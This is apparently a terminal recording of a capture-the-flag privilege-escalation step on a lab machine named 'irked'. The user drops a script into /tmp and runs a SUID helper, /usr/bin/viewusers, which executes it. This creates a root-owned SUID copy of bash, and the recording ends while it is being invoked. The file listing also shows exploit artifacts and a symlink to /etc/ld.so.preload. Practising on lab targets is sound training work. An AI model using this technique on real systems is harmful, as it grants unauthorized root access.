[41.32378, "o", "\r\u001b[7mFile Name to Write: /tmp/listusers                          \r\n^G\u001b(B\u001b[m Get Help\u001b[32C\u001b[7mM-D\u001b(B\u001b[m DOS Format\u001b[29C\u001b[7mM-A\u001b(B\u001b[m Append\u001b[33C\u001b[7mM-B\u001b(B\u001b[m Backup File\r\n\u001b[7m^C\u001b(B\u001b[m Cancel\u001b[7C         \u001b[18C\u001b[7mM-M\u001b(B\u001b[m Mac Format\u001b[29C\u001b[7mM-P\u001b(B\u001b[m Prepend\u001b[80;35H"]
[41.500905, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:26 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[80;35H"]
[41.532359, "o", "\u001b[1;82r\u001b[82;1H\u001b[K\u001b[A\u001b[K\u001b[1;163H\u001b[7m        \u001b[3;1H\u001b(B\u001b[m\u001b[36m#!/bin/bash\u001b[5;1H\u001b[34m\u001b[1mcp\u001b[24C\u001b(B\u001b[m\u001b[32m;\u001b[39m \u001b[34m\u001b[1mchmod\u001b[19C\u001b(B\u001b[m\u001b[32m;\u001b[39m\u001b[80;76H\u001b[1K\u001b[C \u001b[7m[ Wrote 3 lines ]\u001b(B\u001b[m\u001b[K\u001b[1;83r\u001b[82;172H"]
[41.569094, "o", "\u001b[?25l\u001b[Hircd@irked:/tmp$ nano /tmp/listusers\u001b[K\r\nircd@irked:/tmp$ \u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[?12l\u001b[?25h\u001b[2;18H"]
[42.14849, "o", "c"]
[42.284941, "o", "h"]
[42.480129, "o", "m"]
[42.500356, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:27 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[2;21H"]
[42.561954, "o", "o"]
[42.642562, "o", "d"]
[42.783374, "o", " "]
[43.144641, "o", "7"]
[43.310252, "o", "7"]
[43.464644, "o", "7"]
[43.501039, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:28 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[2;27H"]
[43.544383, "o", " "]
[43.774549, "o", "/"]
[43.957089, "o", "t"]
[44.047521, "o", "m"]
[44.107193, "o", "p"]
[44.414572, "o", "/"]
[44.501633, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:29 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[2;33H"]
[44.671358, "o", "l"]
[44.856749, "o", "i"]
[44.926886, "o", "s"]
[45.001275, "o", "t"]
[45.275321, "o", "u"]
[45.410504, "o", "e"]
[45.501034, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:30 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[2;39H"]
[45.55311, "o", "r"]
[45.935616, "o", "\b\u001b[K"]
[46.114554, "o", "s"]
[46.231804, "o", "\b\u001b[K"]
[46.498544, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:31 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[2;39H"]
[46.577663, "o", "\b\u001b[K"]
[46.754381, "o", "s"]
[46.955336, "o", "e"]
[47.209549, "o", "r"]
[47.34711, "o", "s"]
[47.470923, "o", "\r\n"]
[47.499536, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83d  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:32 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[3;1H"]
[47.507719, "o", "ircd@irked:/tmp$ "]
[47.796094, "o", "l"]
[47.872444, "o", "s"]
[47.985475, "o", " "]
[48.078416, "o", "-"]
[48.152668, "o", "l"]
[48.248312, "o", "a"]
[48.360554, "o", " "]
[48.458745, "o", "/"]
[48.503366, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:33 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[3;26H"]
[48.644245, "o", "t"]
[48.772107, "o", "m"]
[48.819198, "o", "p"]
[49.088862, "o", "\r\n"]
[49.092535, "o", "total 1108\r\ndrwxrwxrwt 11 root root   4096 Sep 10 04:35 .\r\ndrwxr-xr-x 21 root root   4096 Sep  8 11:55 ..\r\n-rw-------  1 ircd ircd   2601 Sep 10 03:47 7550.c\r\n-rwx------  1 ircd ircd   6708 Sep 10 03:49 exploit\r\ndrwxrwxrwt  2 root root   4096 Sep  9 17:41 .font-unix\r\n-rwx------  1 ircd ircd   4344 Sep 10 03:49 getuid.so\r\ndrwxrwxrwt  2 root root   4096 Sep  9 17:41 .ICE-unix\r\n-rw-------  1 ircd ircd   1137 Sep 10 03:46 irked.htb.nmap\r\n-rw-------  1 ircd ircd  70790 Sep 10 03:40 LinEnum.out\r\n-rwxrwxrwx  1 ircd ircd  46631 Sep  2 18:00 LinEnum.sh\r\n-rw-------  1 ircd ircd 153936 Sep  9 17:58 linpeas.out\r\n-rwxrwxrwx  1 ircd ircd 776785 Jun 12 01:51 linpeas.sh\r\n-rwxrwxrwx  1 ircd ircd     67 Sep 10 04:35 listusers\r\nlrwxrwxrwx  1 ircd ircd     18 Sep 10 03:49 pstopdf.log -> /etc/ld.so.preload\r\ndrwx------  3 root root   4096 Sep  9 17:41 systemd-private-8ea51046450d41e69c730331a2a034dd-colord.service-T65av2\r\ndrwx------  3 root root   4096 Sep  9 17:41 systemd-private-8ea51046450d41e69c730331a2a034dd-cups.service-jhDt"]
[49.092664, "o", "5J\r\ndrwx------  3 root root   4096 Sep  9 17:41 systemd-private-8ea51046450d41e69c730331a2a034dd-rtkit-daemon.service-R7wQqd\r\ndrwxrwxrwt  2 root root   4096 Sep  9 17:41 .Test-unix\r\ndrwx------  2 root root   4096 Sep  9 17:42 vmware-root\r\n-r--r--r--  1 root root     11 Sep  9 17:41 .X0-lock\r\ndrwxrwxr"]
[49.125919, "o", "wt  2 root root   4096 Sep  9 17:41 .X11-unix\r\ndrwxrwxrwt  2 root root   4096 Sep  9 17:41 .XIM-unix\r\nircd@irked:/tmp$ "]
[49.503606, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:34 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[27;18H"]
[50.506794, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:35 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[27;18H"]
[51.321645, "o", "ls -la /tmp"]
[51.439591, "o", " "]
[51.508861, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:36 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[27;30H"]
[51.66334, "o", "|"]
[51.990996, "o", " "]
[52.091986, "o", "g"]
[52.171898, "o", "r"]
[52.216086, "o", "e"]
[52.281958, "o", "p"]
[52.460748, "o", " "]
[52.507515, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:37 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[27;37H"]
[53.116471, "o", "r"]
[53.208868, "o", "o"]
[53.338862, "o", "o"]
[53.427805, "o", "t"]
[53.50908, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:38 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[27;41H"]
[53.516627, "o", "b"]
[53.721076, "o", "a"]
[53.758159, "o", "s"]
[53.834269, "o", "h"]
[54.038195, "o", "\r\n"]
[54.075922, "o", "ircd@irked:/tmp$ "]
[54.510006, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:39 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[28;18H"]
[55.512795, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:40 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[28;18H"]
[56.515794, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:41 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[28;18H"]
[56.669576, "o", "/"]
[57.455828, "o", "u"]
[57.517203, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:42 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[28;20H"]
[57.523835, "o", "s"]
[57.571041, "o", "r"]
[57.769415, "o", "/"]
[57.965056, "o", "b"]
[58.284386, "o", "i"]
[58.358983, "o", "n"]
[58.516546, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:43 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[28;26H"]
[58.639423, "o", "/"]
[58.755611, "o", "v"]
[58.922537, "o", "i"]
[58.992606, "o", "e"]
[59.066287, "o", "w"]
[59.521043, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:44 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[28;31H"]
[59.663799, "o", "u"]
[59.7548, "o", "s"]
[59.816383, "o", "e"]
[60.003109, "o", "r"]
[60.524623, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:45 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[28;35H"]
[60.548833, "o", "s"]
[60.645136, "o", "\r\n"]
[60.681798, "o", "bash: /usr/bin/viewusers: No such file or directory\r\nircd@irked:/tmp$ "]
[61.448804, "o", "/usr/bin/viewusers"]
[61.52611, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:46 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[30;36H"]
[61.658837, "o", "\b\u001b[K"]
[61.821777, "o", "\r\n"]
[61.858593, "o", "This application is being devleoped to set and test user permissions\r\nIt is still being actively developed\r\n(unknown) :0           2022-09-09 17:41 (:0)\r\nircd@irked:/tmp$ "]
[62.525028, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:47 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[34;18H"]
[63.531566, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:48 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[34;18H"]
[63.756281, "o", "/usr/bin/viewuser"]
[63.9207, "o", "s"]
[64.412109, "o", "\u001b[18Gls -la /tmp | grep rootbash"]
[64.532679, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:49 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[34;45H"]
[65.35708, "o", "\r\n"]
[65.393927, "o", "-rwsr-xr-x  1 root ircd 1105840 Sep 10 04:35 rootbash\r\nircd@irked:/tmp$ "]
[65.536618, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:50 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[36;18H"]
[66.540341, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:51 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[36;18H"]
[67.543308, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:52 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[36;18H"]
[67.777706, "o", "/"]
[68.430418, "o", "t"]
[68.472459, "o", "m"]
[68.544058, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:53 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[36;21Hp"]
[68.772459, "o", "/"]
[68.901247, "o", "r"]
[69.00633, "o", "o"]
[69.15827, "o", "o"]
[69.241553, "o", "t"]
[69.518396, "o", "a"]
[69.543095, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:54 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[36;28H"]
[69.55529, "o", "s"]
[69.654155, "o", "h"]
[70.122617, "o", "\b\u001b[K"]
[70.268331, "o", "\b\u001b[K"]
[70.406446, "o", "\b\u001b[K"]
[70.545704, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                          0:openvpn  1:bash-  2:ruby \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 3:nc*Z \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                         \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  16:35:55 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[36;27H"]
[70.600425, "o", "b"]
